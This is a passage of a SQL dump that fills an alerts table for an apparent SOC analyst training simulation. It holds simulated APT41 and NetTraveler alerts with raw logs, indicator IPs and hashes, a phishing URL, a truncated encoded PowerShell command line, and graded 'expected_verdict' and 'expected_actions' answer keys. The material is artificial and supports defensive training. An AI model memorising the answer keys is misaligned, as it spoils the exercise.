access\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"taskhostw.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware associated with persistence mechanisms\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash related to APT41 malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.138Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T08:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"taskhostw.exe\\\",\\\"hash\\\":\\\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"Registry value added\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.138Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T08:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"taskhostw.exe\\\",\\\"hash\\\":\\\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"Registry value added\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.138Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T08:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"taskhostw.exe\\\",\\\"hash\\\":\\\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"Registry value added\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.138Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T08:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"taskhostw.exe\\\",\\\"hash\\\":\\\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"Registry value added\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.138Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T08:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.199.108.153\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"taskhostw.exe\\\",\\\"hash\\\":\\\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"action\\\":\\\"Registry value added\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1500, 'Lateral Movement Detected', 'high', 'Internal Network Monitoring', 'APT41 is attempting to expand access within the network by targeting specific MAC addresses. Compromised systems are being used to move laterally.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:55:36Z\",\"event\":\"Lateral Movement Attempt\",\"source_ip\":\"10.0.1.15\",\"target_ip\":\"10.0.1.20\",\"attacker_ip\":\"203.0.113.45\",\"compromised_user\":\"j.doe\",\"malware_hash\":\"7a82f1c3b2d5e4a6f9c8d4f9e3b2a4c5\",\"target_mac_address\":\"00:1A:2B:3C:4D:5E\",\"filename\":\"CCleaner_v2.0.exe\"}', '2026-03-15 19:08:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scan\",\"verdict\":\"internal\",\"details\":\"Source IP of lateral movement attempt\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence_feed\",\"verdict\":\"malicious\",\"details\":\"Known APT41 attacker IP\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"7a82f1c3b2d5e4a6f9c8d4f9e3b2a4c5\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT41 CCleaner variant\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_activity_logs\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"CCleaner_v2.0.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used in lateral movement\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1501, 'Targeted Data Exfiltration Attempt', 'high', 'Data Loss Prevention (DLP) Tools', 'An attempt was detected to exfiltrate sensitive data from devices with specific MAC addresses. This marks the final step of the operation by APT41, using their known tactics and tools.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:00Z\",\"event_id\":\"DLP-EXF-2345\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.25\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"HTTPS\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"mac_address\":\"00:1B:44:11:3A:B7\",\"username\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"action\":\"blocked\",\"description\":\"Detected data exfiltration attempt via HTTPS to an unauthorized external IP.\"}', '2026-03-15 19:08:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT41 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT41 known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"File containing sensitive data attempted to be exfiltrated.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.148Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"DLP-EXF-2345\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.25\\\",\\\"source_port\\\":443,\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTPS\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"mac_address\\\":\\\"00:1B:44:11:3A:B7\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Detected data exfiltration attempt via HTTPS to an unauthorized external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.148Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"DLP-EXF-2345\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.25\\\",\\\"source_port\\\":443,\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTPS\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"mac_address\\\":\\\"00:1B:44:11:3A:B7\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Detected data exfiltration attempt via HTTPS to an unauthorized external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.148Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"DLP-EXF-2345\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.25\\\",\\\"source_port\\\":443,\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTPS\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"mac_address\\\":\\\"00:1B:44:11:3A:B7\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Detected data exfiltration attempt via HTTPS to an unauthorized external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.148Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"DLP-EXF-2345\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.25\\\",\\\"source_port\\\":443,\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTPS\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"mac_address\\\":\\\"00:1B:44:11:3A:B7\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Detected data exfiltration attempt via HTTPS to an unauthorized external IP.\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.148Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"event_id\\\":\\\"DLP-EXF-2345\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.1.1.25\\\",\\\"source_port\\\":443,\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTPS\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"mac_address\\\":\\\"00:1B:44:11:3A:B7\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"confidential_data.zip\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Detected data exfiltration attempt via HTTPS to an unauthorized external IP.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1502, 'Suspicious Phishing Email Detected', 'high', 'Email Gateway Logs', 'A phishing email was detected targeting government officials with the intent to deliver a malicious payload for initial access.', 'Phishing', 'T1566', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T08:32:21Z\",\"email_subject\":\"Urgent: Update Your Account Information\",\"sender_email\":\"security-update@fakedomain.com\",\"recipient_email\":\"john.doe@govagency.gov\",\"sender_ip\":\"203.0.113.45\",\"attachment_filename\":\"Account_Update.docm\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"malicious_url\":\"http://malicious-update.com/login\",\"internal_ip\":\"192.168.1.15\"}', '2026-03-15 19:08:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Threat Intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"security-update@fakedomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Threat Intel\",\"verdict\":\"malicious\",\"details\":\"Email domain used in multiple phishing attacks\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with known malware used for credential theft\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-update.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Phishing Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing URL targeting government sectors\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.150Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1503, 'Execution of NetTraveler\'s RAT', 'high', 'Endpoint Detection and Response (EDR) Alerts', 'Following a successful phishing attempt, NetTraveler\'s Remote Access Trojan (RAT) was executed, establishing a foothold within the network. The malware was identified on a user endpoint, initiating network communications to an external IP address associated with known malicious activity.', 'Malware Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"event_id\":\"EDR-4567\",\"detected_by\":\"Endpoint Detection and Response\",\"hostname\":\"workstation-45\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"185.92.220.25\",\"user\":\"j.doe\",\"process\":{\"name\":\"nettraveler.exe\",\"path\":\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\nettraveler.exe\",\"hash\":\"e9f0f9a0d2b1c7e5a3e6b9c8d4f8b7a9\"},\"command_line\":\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\nettraveler.exe\",\"malicious_activity\":\"Established connection to C2 server\",\"indicators\":[{\"type\":\"ip\",\"value\":\"185.92.220.25\"},{\"type\":\"hash\",\"value\":\"e9f0f9a0d2b1c7e5a3e6b9c8d4f8b7a9\"},{\"type\":\"filename\",\"value\":\"nettraveler.exe\"},{\"type\":\"username\",\"value\":\"j.doe\"}]}', '2026-03-15 19:08:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e9f0f9a0d2b1c7e5a3e6b9c8d4f8b7a9\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known NetTraveler RAT sample\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"nettraveler.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual execution path detected\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"User account involved in phishing attempt\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1504, 'Establishing Persistence via Registry Modification', 'high', 'Registry Change Logs', 'The RAT modifies registry keys to ensure it remains active even after system reboots, demonstrating NetTraveler\'s persistence tactics.', 'Persistence Mechanism', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:45:23Z\",\"event_id\":4657,\"user\":\"john.doe\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"source_ip\":\"192.168.1.105\",\"target_object\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\NetTraveler\",\"registry_value_name\":\"NetTraveler\",\"registry_value_type\":\"REG_SZ\",\"registry_value_data\":\"\\\"C:\\\\Program Files\\\\NetTraveler\\\\nettraveler.exe\\\"\",\"process_id\":4820,\"process_name\":\"C:\\\\Windows\\\\System32\\\\regedit.exe\",\"associated_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"attacker_ip\":\"203.0.113.45\"}', '2026-03-15 19:08:51', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous NetTraveler activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\regedit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"Executable associated with NetTraveler persistence mechanism.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hashdb\",\"verdict\":\"malicious\",\"details\":\"MD5 hash of the NetTraveler executable.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"john.doe\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"target_object\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\NetTraveler\\\",\\\"registry_value_name\\\":\\\"NetTraveler\\\",\\\"registry_value_type\\\":\\\"REG_SZ\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\NetTraveler\\\\\\\\nettraveler.exe\\\\\\\"\\\",\\\"process_id\\\":4820,\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\regedit.exe\\\",\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"john.doe\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"target_object\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\NetTraveler\\\",\\\"registry_value_name\\\":\\\"NetTraveler\\\",\\\"registry_value_type\\\":\\\"REG_SZ\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\NetTraveler\\\\\\\\nettraveler.exe\\\\\\\"\\\",\\\"process_id\\\":4820,\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\regedit.exe\\\",\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"john.doe\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"target_object\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\NetTraveler\\\",\\\"registry_value_name\\\":\\\"NetTraveler\\\",\\\"registry_value_type\\\":\\\"REG_SZ\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\NetTraveler\\\\\\\\nettraveler.exe\\\\\\\"\\\",\\\"process_id\\\":4820,\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\regedit.exe\\\",\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-01T14:45:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"john.doe\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"target_object\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\NetTraveler\\\",\\\"registry_value_name\\\":\\\"NetTraveler\\\",\\\"registry_value_type\\\":\\\"REG_SZ\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Program Files\\\\\\\\NetTraveler\\\\\\\\nettraveler.exe\\\\\\\"\\\",\\\"process_id\\\":4820,\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\regedit.exe\\\",\\\"associated_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 